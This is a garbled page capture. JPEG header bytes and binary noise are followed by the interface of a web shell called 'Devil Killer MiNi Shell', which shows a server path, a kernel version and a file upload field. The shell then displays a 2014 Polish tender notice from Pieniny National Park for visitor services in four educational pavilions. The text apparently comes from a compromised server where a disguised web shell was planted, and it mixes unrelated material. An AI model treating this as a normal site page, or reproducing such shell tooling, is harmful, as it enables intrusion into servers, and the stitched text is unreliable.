JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140110/11260-N-2014.html

<p class="kh_header"><b>Krościenko nad Dunajcem: Prowadzenie obsługi zwiedzających w pawilonach  edukacyjnych Pienińskiego Parku Narodowego</b><br>
<b>Numer ogłoszenia: 11260 - 2014; data zamieszczenia: 10.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pieniński Park Narodowy , ul. Jagiellońska 107, 34-450 Krościenko nad Dunajcem, woj. małopolskie, tel. 18 2625601.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie obsługi zwiedzających w pawilonach  edukacyjnych Pienińskiego Parku Narodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A)	prowadzenie obsługi zwiedzających na terenie przystani flisackiej w Sromowcach Kątach 
w okresach: od 1.04.2014 r. do 31.10.2014 r. oraz od 1.04.2015 r. do 31.10.2015 r., obejmujące 
w szczególności:
-	prowadzenie punktu informacyjnego w pawilonie edukacyjnym PPN na przystani 
w Sromowcach Kątach,
-	utrzymanie porządku i czystości na terenie przystani flisackiej w Sromowcach Kątach.
B) prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Sromowcach Niżnych 
w okresach od 1.04.2014 r. do 31.10.2014 r. oraz od 1.04.2015 r. do 31.10.2015 r., obejmujące 
w szczególności:
-	prowadzenie punktu informacyjnego dla zwiedzających PPN wraz ze sprzedażą wydawnictw,
-	utrzymanie porządku i czystości w pawilonie i jego otoczeniu,
-	prowadzenie sanitariatów w pawilonie.
C) prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Hałuszowej w okresach od 1.04.2014 r. do 31.10.2014 r. oraz od 1.04.2015 r. do 31.10.2015 r., obejmujące w szczególności:
-	prowadzenie punktu informacyjnego dla zwiedzających PPN wraz ze sprzedażą wydawnictw,
-	utrzymanie porządku i czystości w pawilonie i jego otoczeniu,
-	prowadzenie sanitariatów w pawilonie.
D) prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Szczawnicy w okresach od 1.04.2014 r. do 31.03.2015 r. oraz od 1.04.2015 r. do 31.03.2016 r., obejmujące w szczególności:
-	prowadzenie punktu informacyjnego dla zwiedzających PPN wraz ze sprzedażą wydawnictw,
-	utrzymanie porządku i czystości w pawilonie, jego otoczeniu i wzdłuż drogi pienińskiej,
-	prowadzenie sanitariatów w pawilonie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem uczestnictwa w przetargu jest wpłata wadium. Wadium w wysokości 500 zł (słownie: pięćset złotych) na każdą ofertę częściową winno być wpłacone na konto Pienińskiego Parku Narodowego w BGK 17 1130 1150 0012 1252 6590 0001 w terminie do 19.01.2014 r. Jeżeli oferent wygrał przetarg na obsługę zwiedzających we więcej niż jednym pawilonie, a następnie odstąpił od podpisania umowy w którejś części zamówienia, wadium na tą część oferty ulega przepadkowi (przykład: oferent wygrywa przetarg w części A,B,C. Podpisuje umowę na część A, ale rezygnuje 
z części B i C. Skutkiem odstąpienia od podpisania umowy jest przepadek wadium za część B i C tj. 2 x 500 zł). Wadium również ulega przepadkowi, jeżeli oferent, który wygrał przetarg nie podpisał umowy w terminie 7 dni od ogłoszenia wyników</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest również konieczność wskazania w ofercie co najmniej dwóch osób na każdy pawilon, które będą prowadzić punkt informacyjny w pawilonie. Ilość zgłoszonych osób do prowadzenia punktów informacyjnych przez jednego oferenta jest dowolna 
z tym, że jeżeli oferent zgłasza ofertę na jeden pawilon to wskazuje minimum 2 osoby, jeżeli na dwa pawilony to minimum 4 osoby, jeżeli na trzy pawilony to minimum 6 osób, jeżeli na cztery pawilony to minimum 8 osób. Oferty, które nie spełniają tego warunku zostaną odrzucone. Osoby wskazane przez jednego oferenta do prowadzenia punktu informacyjnego nie mogą zostać zgłoszone przez innego oferenta. W przypadku zgłoszenia tych samych osób przez dwóch lub więcej oferentów, oferty tych oferentów zostaną odrzucone. W dniu otwarcia ofert osoby zgłoszone do prowadzenia punktu informacyjnego zostaną poddane egzaminowi testowemu, mającemu na celu sprawdzenie ich wiedzy 
w zakresie znajomości Pienińskiego Parku Narodowego, Pienin, ich otoczenia i atrakcji turystycznych. Pytania testowe obejmować będą wiedzę dostępną w następujących publikacjach: 
-	Stefan Michalik - Pieniny - park dwu narodów, przewodnik przyrodniczy, Krościenko n.D 2005,
-	Józef Nyka - Pieniny - przewodnik, Latchorzew 2003 lub nowszy,
-	informator dla zwiedzających i foldery tematyczne wydane przez PPN,
-	strona internetowa www.pieninypn.pl.
Za poprawne rozwiązanie testu można otrzymać 100 punktów. Egzamin zdadzą te osoby, które uzyskają co najmniej 60 punktów.  
	Jeżeli oferent składał ofertę na jeden pawilon to egzamin muszą zdać co najmniej 2 osoby zgłoszone przez niego w ofercie. 
	Jeżeli oferent składał ofertę na dwa pawilony, a egzamin zdały tylko 2 lub 3 osoby, to do oceny 
w przetargu dopuszczona jest 1 oferta cząstkowa najkorzystniejsza cenowo dla zamawiającego. 
	Jeżeli oferent składał ofertę na trzy pawilony, a egzamin zdały 4 lub 5 osób, to do oceny 
w przetargu dopuszcza się odpowiednio 2 oferty cząstkowe najkorzystniejsze cenowo dla zamawiającego. 
	Jeżeli oferent składał ofertę na cztery pawilony, a egzamin zdały 6 lub 7 osób, to do oceny 
w przetargu dopuszcza się odpowiednio 3 oferty cząstkowe najkorzystniejsze cenowo dla zamawiającego.
	W przypadku gdy egzamin zdała tylko 1 zgłoszona osoba lub żadna z nich nie zdała egzaminu to cała oferta zostaje odrzucona.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pieninypn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pieniński Park Narodowy, 34-450 Krościenko n.D  ul. Jagiellońska 107b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2014 godzina 10:00, miejsce: Pieniński Park Narodowy (sekretariat), 34-450 Kroscienko n.D ul. Jagiellońska 107b.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prowadzenie obsługi zwiedzających na terenie przystani flisackiej w Sromowcach Kątach 
w okresach: od 1.04.2014 r. do 31.10.2014 r. oraz od 1.04.2015 r. do 31.10.2015 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje obowiązki:

1.	w zakresie obsługi zwiedzających:
a)	udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego, ze szczególnym uwzględnieniem spływu Przełomem Dunajca,
b)	wydawanie bezpłatnych materiałów informacyjnych pobranych od zleceniodawcy,
c)	zapewnienie wysokiej kultury obsługi.

2.	w zakresie utrzymania porządku:
stałe utrzymanie czystości poprzez regularne sprzątanie z częstotliwością wynikającą 
z bieżących potrzeb oraz codzienne, generalne posprzątanie po zamknięciu kas spływu. 
Zakres prac obejmuje: 
a)	zamiatanie drogi dojścia od parkingu do nabrzeża, schodów na nabrzeżu, drogi wokół pawilonu edukacyjnego, parkingu roboczego, drogi betonowej na nabrzeżu roboczym,  
b)	zbieranie śmieci na całym terenie przystani wraz z nabrzeżem i składem łodzi, na drodze     do przystani roboczej oraz drodze asfaltowej przy przystankach autobusowych od      skrzyżowania z drogą od parkingów, 
c)	koszenie trawników (trawa może dorastać maksymalnie do 8 cm) i bezzwłoczne usunięcie      skoszonej trawy w miejsce wskazane przez zleceniodawcę, grabienie opadłych igieł sosny      oraz innych liści z trawników, pielęgnacja zieleni, zbieranie kamieni, 
d)	wycinanie roślinności wyrastającej na ciągach komunikacyjnych,
e)	regularne oczyszczanie z roślinności i udrożnienie rowów odpływowych, szczególnie na      początku sezonu (do 10 kwietnia) oraz przed zakończeniem sezonu (po 15 października).
Zakres prac porządkowych został zaznaczony na dołączonej do umowy mapie przystani. Niedopuszczalne jest wykonywanie prac uciążliwych dla zwiedzających (zamiatanie, koszenie, usuwanie trawy i.t.p.) w czasie obecności turystów na przystani. 
f)	mycie okien, drzwi, szyb gablot, parapetów i podłogi w pawilonie wystawowym i holu, usuwanie pajęczyn, wycieranie i utrzymanie w czystości ławek na dojściu do nabrzeża, 
g)	opróżnianie koszy na śmieci,
h)	niezwłoczne powiadamianie PPN o konieczności wywozu kontenera i opróżnienia pełnego zbiornika na nieczystości płynne oraz o zaistniałych awariach,
i)	wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów 
i rowów dla spływu wody, wymiana żarówek,
j)	prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca.
k)	przeniesienie wszystkich, opróżnionych ze śmieci koszy do przejścia między kioskami 
w pawilonie wystawowym. W/w prace należy wykonać w dniu 31 października każdego roku po zamknięciu kas spływu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Sromowcach Niżnych 
w okresach: od 1.04.2014 r. do 31.10.2014 r. oraz od 1.04.2015 r. do 31.10.2015 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje obowiazki:
1.	w zakresie obsługi zwiedzających:
a)	udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego,
b)	posiadanie w stałej sprzedaży, uzgodnionego ze zleceniodawcą, zestawu wydawnictw 
oraz pamiątek dotyczących PPN i regionu pienińskiego. Sprzedaż innych towarów wymaga zgody zleceniodawcy,
c)	wydawanie bezpłatnych materiałów informacyjnych pobranych od zleceniodawcy,
d)	wyświetlanie filmów dostarczonych przez zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
e)	zapewnienie wysokiej kultury obsługi.

2.	w zakresie utrzymania porządku:
a)	stałe utrzymanie czystości w pawilonie i jego otoczeniu (schody, podcienie, placyk przy ogródku roślin pienińskich, droga przed pawilonem) poprzez regularne sprzątanie 
z częstotliwością wynikającą z potrzeb oraz codzienne generalne posprzątanie po zamknięciu pawilonu.
b)	utrzymanie w należytym stanie ogródka roślin pienińskich,
c)	koszenie trawników i bezzwłoczne usuwanie skoszonej trawy w miejsce wskazane przez
      zleceniodawcę,  
d)	wycinanie roślinności wyrastającej na ciągach komunikacyjnych,
e)	opróżnianie koszy na śmieci,
f)	niezwłoczne powiadamianie PPN o konieczności wywozu kontenera oraz o zaistniałych awariach,
g)	wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów 
i rowów dla spływu wody, wymiana żarówek,
h)	prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań zawartych w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca.
i)	przeniesienie opróżnionych ze śmieci koszy do pomieszczenia toalety w pawilonie wystawowym oraz założenie okiennic. W/w prace należy wykonać w dniu 31 października każdego roku. 
Zakres prac porządkowych został zaznaczony na dołączonej do umowy mapie. Niedopuszczalne jest wykonywanie prac uciążliwych dla zwiedzających (koszenie i usuwanie trawy, zamiatanie i.t.p.) w czasie obecności turystów w pawilonie lub w jego otoczeniu.

3.	w zakresie prowadzenia sanitariatów:
a)	codzienne otwarcie toalet w godzinach otwarcia pawilonu,
b)	utrzymanie porządku i czystości pomieszczeń,
c)	zapewnienie stałego wyposażenia w: papier toaletowy w każdej kabinie (zabrania się wydzielania papieru), ręczniki papierowe i mydło w płynie w każdym zasobniku, środki zapachowe, kosze w kabinach i na zużyte ręczniki papierowe, szczotki do muszli, środki dezynfekcyjne,
d)	bieżącą konserwację, naprawę i ewentualną wymianę urządzeń umożliwiających ich prawidłowe funkcjonowanie,
e)	usuwanie niedrożności przewodów odpływowych od urządzeń sanitarnych,
f)	realizację poleceń Państwowej Inspekcji Sanitarnej i innych właściwych służb sanitarnych. Zleceniobiorca ponosi pełną odpowiedzialność za przestrzeganie wymogów higieny określonych właściwymi przepisami,
g)	zapewnienie stałego dostępu do ciepłej wody,
h)	codzienną dezynfekcję urządzeń sanitarnych,
i)	występowanie w schludnym stroju.
Zabrania się wieszania, poza istniejącymi urządzeniami, czegokolwiek na ścianach, drzwiach, oknach, kabinach itd. oraz wstawiania mebli.
Za korzystanie z sanitariatów zleceniobiorca może pobierać opłaty. Opłata ta nie może jednak przekroczyć 1,50 zł od osoby. Opłat nie pobiera się od uczestników zajęć edukacyjnych prowadzonych przez pracowników Pienińskiego Parku Narodowego z uczniami ze szkół czterech gmin pienińskich.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prowadzenie obsługi zwiedzających w pawilonie edukacyjnym w Hałuszowej w okresach: 
od 1.04.2014 r. do 31.10.2014 r. oraz od 1.04.2015 r. do 31.10.2015 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje obowiązki:

1.	w zakresie obsługi zwiedzających:
a)	udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego,
b)	posiadanie w stałej sprzedaży, uzgodnionego ze zleceniodawcą, zestawu wydawnictw oraz pamiątek dotyczących PPN i regionu pienińskiego. Sprzedaż innych towarów wymaga zgody zleceniodawcy,
c)	wydawanie bezpłatnych materiałów informacyjnych pobranych od zleceniodawcy,
d)	wyświetlanie filmów dostarczonych przez zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
e)	zapewnienie wysokiej kultury obsługi.

2.	w zakresie utrzymania porządku:
a)  stałe utrzymanie czystości w pawilonie i jego otoczeniu (schody, podcienie, placyk przed
      pawilonem, droga przed pawilonem) poprzez regularne sprzątanie z częstotliwością
      wynikającą z potrzeb oraz codzienne generalne posprzątanie po zamknięciu pawilonu,
b)   koszenie trawników i bezzwłoczne usuwanie skoszonej trawy w miejsce wskazane przez
      zleceniodawcę,  
c)   wycinanie roślinności wrastającej w kostkę brukową na ciągach komunikacyjnych i na
      placu przed wejściem na schody, 
d)   regularne zamiatanie i usuwanie liści z placu przed wejściem na schody,
e)   opróżnianie koszy na śmieci,
f)  niezwłoczne powiadamianie PPN o konieczności wywozu kontenera oraz o zaistniałych
      awariach,
g)   wykonywanie drobnych napraw takich jak: naprawy zamków, oczyszczanie przepustów
      i rowów dla spływu wody, wymiana żarówek,
h)   prowadzenie zaopatrzenia w niezbędne narzędzia i materiały służące realizacji zadań
     zawartych w niniejszym punkcie. Koszty tych zakupów w całości pokrywa zleceniobiorca.
Zakres prac porządkowych został zaznaczony na dołączonej do umowy mapie. 
Niedopuszczalne jest wykonywanie prac uciążliwych dla zwiedzających (koszenie i usuwanie trawy, zamiatanie i.t.p.) w czasie obecności turystów w pawilonie lub w jego otoczeniu.

3.	w zakresie prowadzenia sanitariatów:
a)	codzienne otwarcie toalet w godzinach otwarcia pawilonu,
b)	utrzymanie porządku i czystości pomieszczeń,
c)	zapewnienie stałego wyposażenia w: papier toaletowy w każdej kabinie (zabrania się wydzielania papieru), ręczniki papierowe i mydło w płynie w każdym zasobniku, środki zapachowe, kosze w kabinach i na zużyte ręczniki papierowe, szczotki do muszli, środki dezynfekcyjne,
d)	bieżącą konserwację, naprawę i ewentualną wymianę urządzeń umożliwiających ich prawidłowe funkcjonowanie,
e)	usuwanie niedrożności przewodów odpływowych od urządzeń sanitarnych,
f)	realizację poleceń Państwowej Inspekcji Sanitarnej i innych właściwych służb sanitarnych. Zleceniobiorca ponosi pełną odpowiedzialność za przestrzeganie wymogów higieny określonych właściwymi przepisami,
g)	zapewnienie stałego dostępu do ciepłej wody,
h)	codzienną dezynfekcję urządzeń sanitarnych,
i)	występowanie w schludnym stroju.
Zabrania się wieszania, poza istniejącymi urządzeniami, czegokolwiek na ścianach, drzwiach, oknach, kabinach itd. oraz wstawiania mebli.
Za korzystanie z sanitariatów zleceniobiorca może pobierać opłaty. Opłata ta nie może jednak przekroczyć 1,50 zł od osoby. Opłat nie pobiera się od uczestników zajęć edukacyjnych prowadzonych przez pracowników Pienińskiego Parku Narodowego z uczniami ze szkół czterech gmin pienińskich.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.30.00-8, 90.60.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Powadzenie obsługi zwiedzających w pawilonie edukacyjnym w Szczawnicy w okresach: 
od 1.04.2014 r. do 31.03.2015 r. oraz od 1.04.2015 r. do 31.03.2016 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje obowiązki:

1.	W zakresie obsługi zwiedzających:
f)	udzielanie wszechstronnych informacji na temat Pienińskiego Parku Narodowego,
g)	posiadanie w stałej sprzedaży, uzgodnionego ze zleceniodawcą, zestawu wydawnictw oraz pamiątek dotyczących PPN i regionu pienińskiego. Sprzedaż innych towarów wymaga zgody zleceniodawcy,
h)	wydawanie bezpłatnych materiałów informacyjnych pobranych od zleceniodawcy,
i)	wyświetlanie filmów dostarczonych przez zleceniodawcę. Zabrania się wyświetlania innych filmów i programów telewizyjnych,
j)	zapewnienie wysokiej kultury obsługi.


2.	W zakresie utrzymania porządku:
a)	stałe utrzymanie czystości w pawilonie i jego otoczeniu oraz wzdłuż Drogi Pienińskiej (na odległość do 10 m na skarpie i po lustro wody na Dunajcu) poprzez regularne sprzątanie 
z częstotliwością wynikającą z potrzeb oraz generalne posprzątanie po zamknięciu pawilonu, 
